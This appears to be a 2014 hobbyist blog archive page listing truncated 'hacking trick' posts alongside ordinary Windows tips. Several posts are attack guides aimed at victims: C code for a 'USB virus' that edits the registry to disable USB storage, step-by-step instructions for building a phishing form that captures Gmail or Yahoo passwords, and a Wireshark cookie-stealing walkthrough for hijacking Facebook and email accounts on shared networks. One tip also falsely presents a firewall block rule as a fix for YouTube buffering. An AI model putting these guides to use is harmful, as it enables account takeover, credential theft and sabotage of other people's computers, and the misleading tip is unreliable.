
Showing posts from March, 2014

USB-PenDrivE V!Rus :

Virus is a program which infects computer, in different way. I am explaining about a Virus Which can easily be made in C or C++, ,When we have run .exe file of this Pendrive-usb virus then when we connect pendrive with our computer usb,it will not be connected. Operating System would not be able to detect pendrive. Code is written to directly change the usb registry option and change its key 1.Creating usb-pendrive Virus :-           Install Turbo C or C++ Open TC.exe and there write the coding #include<stdio.h> void main() { system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet \\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f"); } Above Line system(".....................");it is in one Line Save The Above Program as usbblock.c or any other name. Compile and Run the above Program Congratulation! you are succesfull to create the usb-pendrive Virus Now go to drive where C is installed (Open TC folder) and then BIN ,hav...

CreT!Ng a PhiSHing PaGe :

let get start 1. Open and Sign Up. 2. then Login there with your newly registered account. 3. now click on ‘ Create your first form’. 4. Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.) 5. Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo) 6. Now Click on ‘Power Tool’ Option (In right hand side…) 7. Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’ 8. Now Click on ‘Properties’ Option (In right hand side…). These are the form properties. 9. You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim. 10. Now in Thank You URL you must put some link, like or anything. Actually after entering username & passw...

How to detect a keylogger in a system:

Keylogger is the software program or a hardware which reads and store all the key stroke by a user in the system it is installed. Having a keylogger in the system means you are going to loose some thing big. If your system is infected by a keylogger, your email id, facebook account, bank account and all other secure data is on the risk. Now a days hackers are active enough and many website offering free software download with keyloggers attached in it. So you need to know how to protect your system from keyloggers. If you want to know how to detect a keyloggers in a system, you can follow these points: Check the task list by press ctrl+alt+del in windows. Examine all the tasks running in your system, if you are unsure about a task look it up on a search engine. Run your antivirus checker, it's possible this will pick up the Keylogger on your system. Use the system configuration utility to determine which task are loaded at start-up (type "msconfig" in the ru...

Change Your Ip In Less Then 1 Minute:

1. Click on "Start" in the bottom left hand corner of screen 2. Click on "Run" 3. Type in "command" and hit ok You should now be at an MSDOS prompt screen. 4. Type "ipconfig /release" just like that, and hit "enter" 5. Type "exit" and leave the prompt 6. Right-click on "Network Places" or "My Network Places" on your desktop. 7. Click on "properties" You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks. 8. Right click on "Local Area Connection" and click "properties" 9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab 10. Click on "Use the following IP address" under the "General" tab 11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until ...


1 .open run.  2.type 'cmd' without quotes 3.type 'ping w etc. without quotes eg: ping 4.note the ip address written on the top most line,now you are done.

How To Watch Youtube Video Faster Without Buffering

let get start: 1. Go to start  2. Type "cmd" in Run (Run as Administrator) 3. Paste this to the command box : netsh advfirewall firewall add rule name="MITCHRIBARYTUBE" dir=in action=block 4. Hit Enter After you done this go and test it by watching your favorite video on Youtube...


Run Commands: Quote: compmgmt.msc - Computer management      devmgmt.msc - Device manager diskmgmt.msc - Disk management dfrg.msc - Disk defrag eventvwr.msc - Event viewer fsmgmt.msc - Shared folders gpedit.msc - Group policies lusrmgr.msc - Local users and groups perfmon.msc - Performance monitor rsop.msc - Resultant set of policies secpol.msc - Local security settings services.msc - Various Services msconfig - System Configuration Utility regedit - Registry Editor msinfo32 _ System Information sysedit _ System Edit win.ini _ windows loading information(also system.ini) winver _ Shows current version of windows mailto: _ Opens default email client command _ Opens command prompt Run Commands to access the control panel: Quote: Add/Remove Programs control appwiz.cpl Date/Time Properties control timedate.cpl Display Properties control desk.cpl FindFast control findfast.cpl Fonts Folder control fonts Internet Properties control inetcpl.cpl Keyboard Properties ...

Cookie Stealing Attack:

Using this method you can hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc. this works At LAN(local Area Network) . its best place to hack at university, cafe , public place where computer are on one LAN simple Example WI-Fi. What is Cookies And how the use of stealing cookies? Cookies are file’s that stored on Any computer’s By any website when a you visits them . the cookie used by the web server to check the authenticate the Real user . like you Enter Login in Facebook then a unique string’s Generated and the one copy saved in the web server and other is saved on your Browser as a Cookie file . both are matched when you open a Account. so then finally we will start. Step 1: Download the Wire Shark and install it. Step 2: Next open the wire shark and then click on interface. Step 3: Next choose a interface which is received and sending packet and click on start Step 4: Continue the sniffing for around like 10 minutes. Step 5: After a maximum 10 minute st...

10 Method Of Hacking A Facebook Account

Methods Of Hacking A Facebook Account MAIN METHODS OF HACKING FACEBOOK ACCOUNT Now a days  every one is searching on net how to hack a Facebook account..Everyone is trying to get the methods of hacking Facebook....I have got some e mails regarding this topic . So I have decided to give a series of post on this topic....Today's post is an introductory post on this topic . I’m now discovering all the methods used to hack Facebook password and some counter measures can also help you protect your Facebook account from hacking. 1. Phishing Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim login through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the ha...

Ethical Hackinng Of Password?

Keep Out the Bad Guys : Ethical hacking If you  remember  the Star Wars movies, there were two sides of the Force. The  light side  and the dark side. In the world of hacking, ethical  hacking  is considered the light side of  hacking . Why? Because ethical hackers use their skills and abilities for a constructive matter. Their intention is to offer adequate protection to their clients and assure them that they will be safe from hacker attacks. But it isn't easy to become a  certified ethical hacker . You need to gain some reputation along with work experience in security field. What Is Ethical Hacking? They dedicate  their skills  to serve their clients. Instead of spending long nights inside obscure rooms filled with  computers looking for some victim, they work inside corporations, finding ways to protect the networks and computer systems. Who Does This? A hacker is a person who finds enjoyment in increasing the capacity of ...

How To Check Your PC Was Used After Your Absence

Check If Your computer was used in your absence?  Do you want to know whether your PC was used in your absence?  Just follow these simple steps:  => Goto Run and type eventvwr.msc in the Run dialog box.  => Events are stored in three log files: Application,Security, and System. These logs can be reviewed and archived.  => For our purposes we want the System log. Click on “System” in the left-hand column for a list of events.  => Look for a date and time when you weren't home and your computer should have been off.  => You can also use this log to see how long someone was on the computer.  => Just look at the time the computer was turned on and off for that day. You Are done.

How To Remove Last Name From Facebook Profile

This trick is working for Mozilla Firefox so try it on Mozilla. Firstly Change your Browser Proxy Manually use one of the proxy from below given. HTTP Proxy :- PORT :- 8080 Then Save Your Settings. Now Open your Facebook Account Name Settings. Change your language from English (us) to Bahasa Indonesia Then Simply remove Your Last Name And Save it. Now Your Facebook Account is only with First Name Without Last Name. After Completing all steps remove Manual Proxy and select use system proxy settings and change change your language back to English (us) Note: This Trick Is Working Only On Mozilla Firefox Browser

Windows 8 Shortcuts You Need To Know

In these key combinations, hold down the Windows key (normally located between Alt and Ctrl) and another key, as described on this list. # Press the Windows key to enter the tiled Start screen. # The Windows key + M minimizes everything that's showing on the desktop. # The Windows key + E opens Explorer for quick access to folders. # On the Start screen, press the Windows key + D to instantly get to the desktop. # The Windows key + Tab opens a list of currently running programs. # The Windows key + Print Screen takes a screenshot and saves it in a Screenshots folder nested in your Pictures folder. # To take a screenshot on a Windows 8 tablet, simultaneously press the Windows button and the volume-down button on the tablet chassis. # The Windows key + Q opens a global search menu. Type what you're looking for and where you would like to look. # The Windows key + W opens a search in your system settings to quickly locate and change system properties. # The Windows key + F opens ...